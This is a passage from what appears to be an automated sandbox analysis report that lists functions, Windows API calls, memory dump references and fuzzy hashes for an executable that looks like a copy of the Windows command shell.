                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF7D15249F1), ref: 00007FF7D1524A28
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7D15249F1), ref: 00007FF7D1524A66
                                                                                                                                                                                                                                                                                                                                                                                                                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7D15249F1), ref: 00007FF7D1524A7D
                                                                                                                                                                                                                                                                                                                                                                                                                                        • memmove.MSVCRT(?,?,00000000,00007FF7D15249F1), ref: 00007FF7D1524A9A
                                                                                                                                                                                                                                                                                                                                                                                                                                        • FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7D15249F1), ref: 00007FF7D1524AA2
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: EnvironmentHeapStrings$AllocFreeProcessmemmove
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1623332820-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 7b7d5cd90c4b7fc4a2429fe2183f3170931abb96c0362b724e039f9c86480d2b
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 698b0477c31b57655b8129feebdd0b7bf6dc0c8220588d9c75094cd329cf8be1
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7b7d5cd90c4b7fc4a2429fe2183f3170931abb96c0362b724e039f9c86480d2b
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 93119122A1579B82EB50AB01A41403DFBA1FB8AF80BD99076DE4F03765DFBDE4418760
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1525CB4 Relevance: 7.5, APIs: 5, Instructions: 36synchronizationCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: CloseCodeExitHandleObjectProcessSingleWaitfflushfprintf
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1826527819-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: f8285144374bbb89e131d7d8273940fb18d22798a679a0c343d3d7f73308b0f6
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 35015B2190868BCAF704BB14E4542BCFAA0EB8AB55FD46172E94F033B1CFBCA044C720
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1523060 Relevance: 6.1, APIs: 4, Instructions: 98COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1521EA0: wcschr.MSVCRT(?,?,?,00007FF7D151286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF7D1540D54), ref: 00007FF7D1521EB3
                                                                                                                                                                                                                                                                                                                                                                                                                                        • SetErrorMode.KERNELBASE(00000000,00000000,0000000A,00007FF7D15192AC), ref: 00007FF7D15230CA
                                                                                                                                                                                                                                                                                                                                                                                                                                        • SetErrorMode.KERNELBASE ref: 00007FF7D15230DD
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7D15230F6
                                                                                                                                                                                                                                                                                                                                                                                                                                        • SetErrorMode.KERNELBASE ref: 00007FF7D1523106
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: ErrorMode$FullNamePathwcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1464828906-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 13675d2372c316cd7a7c50d6965756c4bc3950d983800b2edb6765f6a99b1507
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BA31D623E1865B82F764BF15A44007EF661EB49B90FE48176DA4B873F0EEBDE8458710
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D151CA40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: memset
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: onecore\base\cmd\maxpathawarestring.cpp
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2221118986-3416068913
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 354249369565cc9ef09f053ebda407e590cb74e6a014b37d15ae85d075e39d60
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2911C622A0864B81FB51EB55F1542BDA2909F85BA4FD84232DE6F4B7F5DEBDD4808320
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D151BE00 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 120COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: memsetwcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: 2$COMSPEC
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1764819092-1738800741
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 4145adacbd372f8444f0baa456e0340d6b4c9ec16e6b1af03a09be9d7aa3917b
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D4518C21A0C24B49FF62BB25A45137DB3A19F44784FC64133DA0F862F5DEBCE8808671
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1522EFC Relevance: 4.6, APIs: 3, Instructions: 101COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: wcschr$ErrorFileFindFirstLastwcsrchr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 4254246844-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 957b6616a90fc8dff72bb369af8d616d7be4d88c64500895f40bc219e0b26270
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 757c993819457d19fbbde932c37bde87c3049a1861c8db628f9d9e56340f3e14
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 957b6616a90fc8dff72bb369af8d616d7be4d88c64500895f40bc219e0b26270
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BB41C423A0874B86FF60AB00E44477DE7A0EF89790FD44572DA4F877A4EEBCE4458620
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D152498C Relevance: 4.5, APIs: 3, Instructions: 33memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Heap$EnvironmentFreeProcessVariable
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2643372051-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 49892fdbdbb93a03844bd16286cde042899f8d20c3c19ceaef7f6d70d853aae3
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 7a5748906c696152ccf6e705b5419b00b721f559189fda1ed1852f61b0ba193d
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 49892fdbdbb93a03844bd16286cde042899f8d20c3c19ceaef7f6d70d853aae3
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 46F0A262A19B4B81FB00AB25A44407CEAB1FF4A7A0BD59232D56F433B0DFBC94448210
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1525A68 Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: _get_osfhandle$ConsoleMode
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1591002910-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: d21188bd2ade0c669add39b11ffce73f14c6eb686c72b3e53b20c1460e3ce33c
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 71F05474A0961B8BF744AF11E85507CBBB1BB89711BD44136D90B43330DFBCA4058A20
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D152291C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: DriveType
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: :
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 338552980-336475711
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 32b4df8c8b9c83d7cb440aeefaaeaafa00aa23679f308d796fb0f2d13ca7615f
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E2E0E563618605C6EB209B50E05106EF7A0FB8C348FC41535EA8E83734DB3CC249CB08
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1525AD8 Relevance: 3.1, APIs: 2, Instructions: 93COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7D151B9A1,?,?,?,?,00007FF7D151D81A), ref: 00007FF7D151CDA6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7D151B9A1,?,?,?,?,00007FF7D151D81A), ref: 00007FF7D151CDBD
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetConsoleTitleW.KERNELBASE ref: 00007FF7D1525B52
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1524224: InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7D1524297
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1524224: UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7D15242D7
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1524224: memset.MSVCRT ref: 00007FF7D15242FD
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1524224: memset.MSVCRT ref: 00007FF7D1524368
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1524224: GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7D1524380
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1524224: wcsrchr.MSVCRT ref: 00007FF7D15243E6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1524224: lstrcmpW.KERNELBASE ref: 00007FF7D1524401
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0 ref: 00007FF7D1525BC7
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
